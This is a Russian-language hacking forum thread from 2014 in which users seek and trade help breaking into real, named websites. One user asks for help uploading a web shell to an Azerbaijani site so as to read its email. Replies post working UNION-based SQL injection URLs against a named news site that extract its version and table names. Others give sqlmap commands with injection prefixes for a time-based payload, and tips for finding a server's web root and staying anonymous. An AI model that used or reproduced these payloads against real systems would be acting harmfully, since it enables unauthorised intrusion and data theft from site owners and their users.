Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&SectionID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac

    не как не смог сглмапом так же Хавижом( в чем проблема не пойму(


    2) aztexnika.az/upload.php
    aztexnika.az/admin/upload.php

    нужно залить шелл. нужен доступ емаилу с этого сайта(
     
    #22981 2fed, 25 Jan 2014
    Last edited: 25 Jan 2014
  2. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Есть уязвимость. SQLi
    Предположим так (заменил дабы не палить):
    Url: http://www.site.com/threadrate.php?t=104496
    Method: post
    Param: securitytoken
    Payload: "));SELECT+SLEEP(15)/*
    Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5

    как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
    А без него уязвимость не видит. Прошу, помогите
     
  3. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    116
    Likes Received:
    29
    Reputations:
    23
    Прежде чем говорить - проверьте.
    HTML:
    sqlmap --help
    За payload отвечает две опции:
    --prefix=PREFIX Injection payload prefix string
    --suffix=SUFFIX Injection payload suffix string

    соответственно Ваш запрос будет примерно таким:
    PHP:
    sqlmap --url="http://www.site.com/threadrate.php?t=104496" --data="securitytoken=guest*&t=104496&pp=10&page=1&vote=5" --prefix="));" --dbms="MySQL"
     
  4. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0

    Для начала спасибо вам, попробую.
    А так я и вправду видел это, но как это применять в команде не понимал. Тоесть если у меня:
    Payload: '"%2bSLEEP(15)--
    то команда будет включать
    Code:
    --prefix=""%2b"
    ?
     
    #22984 BigBanMan, 25 Jan 2014
    Last edited: 25 Jan 2014
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Проблема в отсутствии знаний.
    http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru
     
    1 person likes this.
  6. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    опять ничего(
     
    #22986 2fed, 26 Jan 2014
    Last edited: 26 Jan 2014
  7. T.G.K

    T.G.K Banned

    Joined:
    12 Sep 2013
    Messages:
    46
    Likes Received:
    8
    Reputations:
    12
    Что можно сделать с этим: http://rp-gameworld.ru/index.php?c=registration&action=reg
    или http://rp-gameworld.ru/?c=search
     
    1 person likes this.
  8. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    Host IP: 90.156.201.28
    Web Server: Microsoft-IIS/8.0у
    Powered-by: ASP.NET
    Keyword Found: Не
    I guess injection type is Integer?! If injection failed, retry with a manual keyword.
    DB Server: MySQL
    Finding columns count(MySQL,MsSQL 2005): 1

    и всё ничего не находит.
     
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Не через мозилу открывай.
    [​IMG]
     
    _________________________
  10. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    а что на счет
    http://aztexnika.az/uppload.php

    http://aztexnika.az/admin/uppload.php
     
  11. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    да уж

    причем тут мозилла ?))
     
  12. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,(select/**/unhex(hex(table_name))/**/from/**/information_schema.tables/**/limit/**/0,1),4,5,6-- a&submit=Искать&mode=allwords&SectionID=-1&Lang=_Ru
     
  13. salevan

    salevan New Member

    Joined:
    24 Jan 2014
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    здравствуйте.
    вопрос в следующем. у меня интернет соединение 20кб/с. с таким интернетом дедик юзать не актуально ,как я понимаю(поправьте, если не прав). собственно вопрос, как обезопасить себя. виртуалка? торы? что сделать. простите, на форуме очень много воды, искать нужную информацию просто нет времени.
     
  14. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребята, прошу, скажите что такое payload и как его задать в ручную в sqlmap(
    Если Payload: '"%2bSLEEP(15)--
    То --prefix=""%2b"
    Так? если так то не идет всеравно
     
  15. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    116
    Likes Received:
    29
    Reputations:
    23
    Тебе дали готовый запрос к sqlmap, просто скопируй и вставь в терминал.
     
  16. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Я бы не просил объяснить если работало бы. Дело в том что и не получается.
     
  17. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    как найти полный путь к корню сайта
     
  18. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    241
    Likes Received:
    161
    Reputations:
    108
    phpinfo, ошибки php, подбор пути, исходя из параметров сервера
     
  19. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    возможно ли провести иньекцыю в запросе
    ошибка получается в запросе
    дайте напутствие господа форумчане заранее благодарен
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,446
    Likes Received:
    763
    Reputations:
    834
    Да, надо только закончить логическую структуру запроса!

    К примеру:
    SELECT DISTINCT forum.title from forum AS
    forum WHERE forumid IN (2
    ) and 1=1 -- )
     
    _________________________
Loading...
Thread Status:
Not open for further replies.